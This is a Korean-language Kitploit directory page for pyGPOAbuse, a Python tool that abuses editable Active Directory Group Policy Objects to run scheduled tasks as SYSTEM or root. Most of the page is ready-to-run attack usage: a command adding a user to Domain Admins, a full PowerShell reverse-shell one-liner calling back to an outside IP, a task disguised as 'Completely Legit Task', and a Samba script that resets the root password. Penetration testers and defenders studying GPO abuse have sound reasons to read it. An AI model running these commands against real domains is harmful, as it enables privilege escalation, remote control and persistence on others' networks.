Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pyGPOAbuse — SharpGPOAbuse의 부분적 파이썬 구현 | Kitploit
도구/GitHubGitHub/hackndo/pygpoabuse
Privilege EscalationExploitationLateral MovementPost-ExploitationPenetration Testing
GitHubhackndo/pygpoabuse

pyGPOAbuse

SharpGPOAbuse의 부분적 파이썬 구현

저장소 보기
5857112개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pyGPOAbuse

D4RKMATT3R의 필터 추가 기능

  • 면책 조항: 이 도구는 로컬 AD 환경에서만 간단히 테스트되었습니다. 예상치 못한 동작이나 오작동에 대해 책임지지 않으며, 있는 그대로 제공되며, 승인된 테스트 용도로만 사용해야 하며, 전적으로 사용자 본인의 책임 하에 사용하십시오.
  • 이제 SharpGPOAbuse와 유사하게 사용자 또는 호스트를 필터링하여 대상 지정을 지원합니다.
  • 시나리오: GPO가 Active-Directory 도메인에 연결되어 있어 작업이 해당 도메인 내의 모든 영향을 받는 개체(사용자/호스트)에 적용되므로 불필요한 노이즈와 아티팩트가 많이 남게 됩니다. 따라서 도메인 컨트롤러와 같은 특정 대상에서 명령을 실행하는 보다 정확한 접근 방식이 선호됩니다.
root@kitploit:~
Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled):
  -filter-enabled       Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user
  -target-dns-name FQDN
                        Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)
  -target-username DOMAIN\USER
                        User task: only this user processes the task (format: DOMAIN\username)
  -target-user-sid SID  User task: SID of the targeted user (optional, more robust matching)

예시

root@kitploit:~
# Add Domain user and add to Domain Admins via Domain-Controller
python3 pygpoabuse.py red.local/user:Testing123 -gpo-id D9A65E7F-112D-49B9-AF7A-4FC2BA092BF6 -taskname SecurityUpdate  -dc-ip 192.168.152.2 -command 'net user UserGPO P@ssw0rd /add && net group "Domain Admins" UserGPO /add' -filter-enabled -target-dns-name dc01.red.local

설명

SharpGPOAbuse(@pkb1s 제작)의 Python 부분 구현

이 도구는 제어된 계정이 하나 이상의 사용자 및 컴퓨터에 적용되는 기존 GPO를 수정할 수 있을 때 사용할 수 있습니다. 컴퓨터 GPO의 경우 원격 컴퓨터에서 즉시 예약 작업을 SYSTEM으로 생성하고, 사용자 GPO의 경우 로그인한 사용자로 생성합니다.

기본 동작은 로컬 관리자를 추가합니다.

Example

사용 방법

기본 사용법

john 사용자를 로컬 관리자 그룹에 추가 (비밀번호: H4x00r123..)

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

고급 사용법

리버스 셸 예시

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

정리

실행 후 예약 작업을 삭제합니다.

root@kitploit:~
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --cleanup

Samba AD 사용법

이 도구는 Samba AD 도메인에서도 사용할 수 있습니다. 컴퓨터 GPO의 경우 원격 컴퓨터에서 root로 즉시 작업을 생성합니다.

먼저 Bash 스크립트 또는 ELF 파일을 생성합니다.

root@kitploit:~
#!/bin/bash
echo "root:1234" | chpasswd

그런 다음 --linux-exec 인수와 함께 도구를 실행합니다.

root@kitploit:~
./pygpoabuse.py DOMAIN/user:password -gpo-id "12345677-ABCD-9876-ABCD-123456789012" --linux-exec /path/to/executable

Example

크레딧

  • @pkb1s의 SharpGPOAbuse
  • @airman604의 schtask_now.py
  • @SkelSec의 msldap
도구 다운로드